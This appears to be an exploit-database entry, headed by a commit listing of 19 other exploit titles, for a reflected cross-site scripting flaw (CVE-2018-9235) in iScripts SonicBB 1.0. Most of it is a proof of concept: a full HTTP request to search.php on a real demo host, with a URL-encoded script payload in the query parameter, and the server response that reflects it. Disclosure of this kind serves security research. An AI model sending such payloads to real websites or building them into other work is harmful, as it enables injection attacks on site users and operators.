c91cad5a90
19 changes to exploits/shellcodes WebKit - WebAssembly Parsing Does not Correctly Check Section Order CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure H2 Database - 'Alias' Arbitrary Code Execution GoldWave 5.70 - Local Buffer Overflow (SEH Unicode) PMS 0.42 - Local Stack-Based Overflow (ROP) Unitrends UEB 10.0 - Unauthenticated Root Remote Code Execution WolfCMS 0.8.3.1 - Cross Site Request Forgery Cobub Razor 0.7.2 - Add New Superuser Account MyBB Plugin Recent Threads On Index - Cross-Site Scripting WolfCMS 0.8.3.1 - Open Redirection Yahei PHP Prober 0.4.7 - Cross-Site Scripting WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection KYOCERA Net Admin 3.4 - Cross Site Request Forgery - Add Admin Exploit Buddypress Xprofile Custom Fields Type 2.6.3 - Remote Code Execution WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution iScripts SonicBB 1.0 - Reflected Cross-Site Scripting WordPress Plugin Google Drive 2.2 - Remote Code Execution
65 lines
No EOL
2 KiB
Text
65 lines
No EOL
2 KiB
Text
# Exploit Title: iScripts SonicBB 1.0 - Reflected Cross-Site Scripting
|
|
# Date: 02/04/2018
|
|
# Exploit Author: ManhNho
|
|
# Vendor Homepage: https://www.iscripts.com
|
|
# Demo Page: https://www.demo.iscripts.com/sonicbb/demo/
|
|
# Version: 1.0
|
|
# Tested on: Windows 10
|
|
# Category: Webapps
|
|
# CVE: CVE-2018-9235
|
|
|
|
1. Description
|
|
====================
|
|
iScripts SonicBB 1.0 has Reflected Cross-Site Scripting via the query
|
|
parameter to search.php
|
|
|
|
2. PoC
|
|
====================
|
|
Request:
|
|
|
|
GET
|
|
/sonicbb/demo/search.php?query=%22%3E%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E
|
|
HTTP/1.1
|
|
Host: www.demo.iscripts.com
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0)
|
|
Gecko/20100101 Firefox/59.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-GB,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Cookie: __utma=227100805.298811387.1522637403.1522637403.1522637403.1;
|
|
__utmb=227100805; __utmc=227100805;
|
|
__utmz=227100805.1522637403.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none);
|
|
PHPSESSID=grh7l3amrvhoapig8ll268l9o4;
|
|
messagesUtk=9ae2fcc5306f4d9c8d433f0f58efb968; hs-messages-is-open=false
|
|
Connection: close
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
Response:
|
|
|
|
HTTP/1.1 200 OK
|
|
Date: Mon, 02 Apr 2018 02:58:48 GMT
|
|
Server: Apache
|
|
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
|
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
|
|
pre-check=0
|
|
Pragma: no-cache
|
|
Connection: close
|
|
Content-Type: text/html
|
|
Content-Length: 3619
|
|
...
|
|
<tr>
|
|
<td width="76%" class="alt1"><a href="index.php">iScripts Forum</a> ->
|
|
<a href="search.php?query="><script>alert('1')</script>">Search</a></td>
|
|
<td width="24%" align="center" class="alt1">
|
|
<form method="GET" action="search.php" style="display: inline">
|
|
<input type="text" name="query" size="12" style="font-size: 10px">
|
|
<input type="submit" value="Search" style="font-size: 10px">
|
|
</form>
|
|
</td>
|
|
</tr>
|
|
...
|
|
|
|
3. References
|
|
====================
|
|
https://pastebin.com/caQW37fY
|
|
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-9235 |